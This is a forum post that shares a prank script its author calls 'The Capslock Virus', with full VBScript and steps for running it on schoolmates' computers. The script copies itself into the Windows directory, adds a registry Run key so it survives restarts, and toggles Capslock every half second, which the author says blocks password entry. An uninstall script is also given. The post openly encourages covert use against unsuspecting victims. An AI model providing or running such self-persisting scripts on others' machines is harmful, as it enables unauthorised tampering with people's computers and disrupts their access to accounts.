jabberwock95
Tank
- Joined
- Sep 18, 2003
- Messages
- 1,222
- Reaction score
- 1
After having a good laugh at CptStern's thread about annoying coworkers, I remembered that one of my favorite passtimes used to be dreaming up new and fun computer pranks to torture my schoolmates with.
Since I have so much time on my hands (summer break), I decided to try to collect the best and most annoying computer pranks together in one thread, ready for any aspiring prankster to release on his (or her) unsuspecting victims.
I will try to post as many of my old favorites as possible, starting with 'The Capslock Virus' that I posted in Sterns thread.
So, post your opinions/experiances/favorite pranks here! And the technically-unsavvy will shake with fear...
Since I have so much time on my hands (summer break), I decided to try to collect the best and most annoying computer pranks together in one thread, ready for any aspiring prankster to release on his (or her) unsuspecting victims.
I will try to post as many of my old favorites as possible, starting with 'The Capslock Virus' that I posted in Sterns thread.
Well, someone expressed interest in the Visual Basic pranks I pulles at school, so I will take the opportunity to show off mercilessly. :E
The prank I got the best result with is simple in theory. Once run on someones computer, the VBS file copies itself to the windows directory, adds a note to the registry to run it on startup, and executes a simple script that turns Capslock on and off about once a second.
Hilarity usually ensues as the victim is unable to tYpE AnyTHinG iN onE casE. One slightly malicious aspect to this program is that the victim will be unable to access anything that needs a password unless they focus hard. They usually get annoyed when they realise restarting does not solve the problem.
To use the code, copy and paste it into notepad, and save it as 'Installer.vbs' The filename is important, because I dont know enough VBS to make it better. To Use:
1. Place 'Installer.vbs' on the root of the C: drive. The path must be C:\Installer.vbs or it won't work!
2. Run the file.
3. Thats it. You may now delete the file.
Heres the code:
Code:'Copies C:\Installer.vbs to C:\Windows\SysMyn.vbs Set fso = CreateObject("Scripting.FileSystemObject") fso.CopyFile "C:\Installer.vbs", "C:\Windows\SysMyn.vbs" 'Alters the registry to run C:\Windows\SysMyn at startup Set WshShell = Wscript.CreateObject("Wscript.Shell") WshShell.RegWrite "HKLM\software\microsoft\windows\currentversion\run\sysmyn", "C:\Windows\SysMyn.vbs" 'Turns Capslock on and off Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 500 wshshell.sendkeys "{CAPSLOCK}" loop
Since I am so brilliant (and so geeky), and since the fun often depends on being able to remove the evidence, I have also created an uninstall file.
1. Save the code as whatever.vbs (filename not important)
2. Place anywhere on victims computer (path not important)
3. Run. All evidence of the original prank will be removed (not including the original installer file!), and Capslock will stop flashing. Simple as that.
Uninstall file:
Code:'deletes the file Set fso=CreateObject("Scripting.FileSystemObject") fso.deletefile ("C:\Windows\SysMyn.vbs") 'removes the registry entry Set WshShell = Wscript.CreateObject("Wscript.Shell") WshShell.RegDelete "HKLM\software\microsoft\windows\currentversion\run\sysmyn" 'stops the process Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") strQuery = "Select * from Win32_Process where Name='WScript.exe'" Set colItems = objWMIService.ExecQuery(strQuery,,48) For Each objItem in colItems objItem.Terminate Next
I would post the files themselves, but .vbs files often contain viruses and are blocked by these forums and most other things. Unfortunately, they sometimes provoke virus scanners into a malicious script warning, so beware.
Oh, and dont post on these forums under the influence of what someone called 'The Capslock Virus', or you will be mistaken for a n00b and banned before you can explain. :E
:cheers:
So, post your opinions/experiances/favorite pranks here! And the technically-unsavvy will shake with fear...